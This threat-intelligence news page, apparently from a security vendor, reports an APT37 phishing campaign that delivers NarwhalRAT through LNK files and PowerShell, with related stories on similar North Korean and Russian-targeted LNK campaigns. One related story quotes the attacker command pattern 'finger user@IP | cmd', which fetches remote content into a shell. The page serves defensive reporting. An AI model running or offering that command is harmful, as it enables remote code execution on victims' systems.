APT37 Phishing Campaign Uses LNK Files and PowerShell to Deploy NarwhalRAT
Researchers reported that APT37 targeted Korean users with spear-phishing emails posing as urgent Microsoft Account Team messages and cybersecurity advisories, delivering ZIP archives that contained malicious .lnk files. The shortcut files abused native Windows tools including cmd, PowerShell, and curl.exe to fetch a decoy document and staged payloads, ultimately installing NarwhalRAT, a Python-based remote access trojan compiled from Python code. Genians linked the activity to Korea-focused infrastructure and artifacts, including references to naverwhale, KakaoTalk-related handling, and Korean relay servers.
Once installed, NarwhalRAT established persistence through a scheduled task disguised as a Microsoft task, performed anti-VM checks, and enabled broad surveillance and control functions such as keylogging, screen capture, microphone recording, file transfer, USB data collection, and remote command execution. The malware used a dual command-and-control design that combined Korean relay domains with the pCloud API as a dead-drop resolver, complicating detection and tracking. Researchers urged defenders to strengthen EDR coverage for suspicious LNK-to-PowerShell execution chains, unusual scheduled task creation, unexpected curl.exe activity, and silent Python execution.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
3 events from the most recent confirmed update back to the earliest known activity.
Cybersecurity News reports Korean-targeted NarwhalRAT campaign details
On June 15, 2026, Cyber Security News reported technical details of the campaign, including ZIP-delivered malicious LNK files abusing CMD, PowerShell, and curl.exe to install NarwhalRAT, along with persistence and anti-VM behavior.
Bluesky posts amplify Genians NarwhalRAT findings
On June 14, 2026, Bluesky posts by lazarusholic shared the Genians report and associated the NarwhalRAT phishing activity with APT37 and DPRK-linked operations.
Genians publishes analysis of APT37 NarwhalRAT campaign
On April 30, 2026, Genians published a threat intelligence report analyzing a spear-phishing campaign attributed to APT37 that used Microsoft-themed lures, malicious LNK files, and a Python-based NarwhalRAT with dead-drop C2 via pCloud and Korean relay infrastructure.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
8 references tracked. Mallory keeps watching after this page renders.
North Korean hackers use fake Microsoft alerts to deploy NarwhalRAT malware | brief | SC Media
scworld.com
Open sourceFake Microsoft Alerts Used to Deploy North Korean NarwhalRAT Malware
thehackernews.com
Open sourceHackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT
cybersecuritynews.com
Open sourceAnalysis of APT37 NarwhalRAT Leveraging MS-Themed Phishing and Dead-drop C2 - Malware News - Malware Analysis, News and Indicators
malware.news
Open sourcePost by @lazarusholic.bsky.social - Bluesky
bsky.app
Open sourcePost by @lazarusholic.bsky.social - Bluesky
bsky.app
Open sourceAnalysis of APT37 NarwhalRAT Leveraging MS-Themed Phishing and Dead-drop C2
genians.co.kr
Open sourceMS 사칭 피싱과 Dead-drop C2 기반 APT37 NarwhalRAT 분석
genians.co.kr
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Phishing campaigns using Windows LNK files and PowerShell loaders to deliver RATs and ransomware
Multiple recent intrusion reports describe **phishing-led Windows compromises** that rely on **weaponized `.LNK` shortcuts** to trigger **obfuscated PowerShell** execution, display decoy documents, and then fetch additional payloads from public cloud/code platforms. In South Korea, attackers distributed an LNK disguised as financial trading guidance that opens a decoy PDF while running PowerShell; subsequent stages perform anti-analysis/virtualization checks, establish persistence, and retrieve a masked executable from **GitHub** that decrypts code at runtime to run **MoonPeak** malware. Researchers assessed the activity as likely **North Korea–linked** based on GitHub commit metadata and naming patterns. A separate Russia-targeted campaign used business-themed archives containing decoy documents and a malicious LNK to pull a PowerShell loader that establishes persistence and then weakens defenses (including **Microsoft Defender exclusion changes** and use of **`defendnot`**), performs reconnaissance, and tampers with system tooling and file associations before deploying **Amnesia RAT** (fetched from **Dropbox**) and a **Hakuna Matata–derived ransomware** payload for encryption. By contrast, reporting on **KazakRAT** describes a different espionage operation in Kazakhstan/Afghanistan delivered via malicious **MSI** installers and using simple, unencrypted HTTP C2; it is not part of the LNK/PowerShell delivery chains described in the other incidents.
Mar 21, 2026
North Korean Phishing Campaign Uses GitHub as Covert C2 Against South Korean Firms
FortiGuard Labs reported a high-severity cyber espionage campaign linked to North Korean state-sponsored actors that targets organizations in South Korea with phishing emails carrying malicious Windows `.lnk` files disguised as PDF documents. When opened, the shortcut launches PowerShell and other native Windows scripting tools while showing a decoy document, then performs anti-analysis checks for tools including Wireshark, Fiddler, x64dbg, Procmon, and `vmtoolsd`. Researchers said the operation has been active since at least 2024 and has evolved from earlier, less-obfuscated variants associated with XenoRAT into more sophisticated samples that embed decoding logic and payload data directly in the shortcut file. The malware establishes persistence through a Scheduled Task disguised as a technical paper and set to run every 30 minutes, then collects host data such as OS version, build number, process lists, and keep-alive logs. Operators used trusted GitHub accounts and private repositories as covert command-and-control and data-staging infrastructure, allowing malicious HTTPS traffic to blend with normal web activity while exfiltrating system information and retrieving follow-on instructions. Decoy filenames and metadata, including the "Hangul Document" naming convention, indicate deliberate targeting of South Korean companies and tradecraft aligned with clusters such as **Kimsuky**, **APT37**, and **Lazarus**.
Apr 19, 2026
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
Mar 21, 2026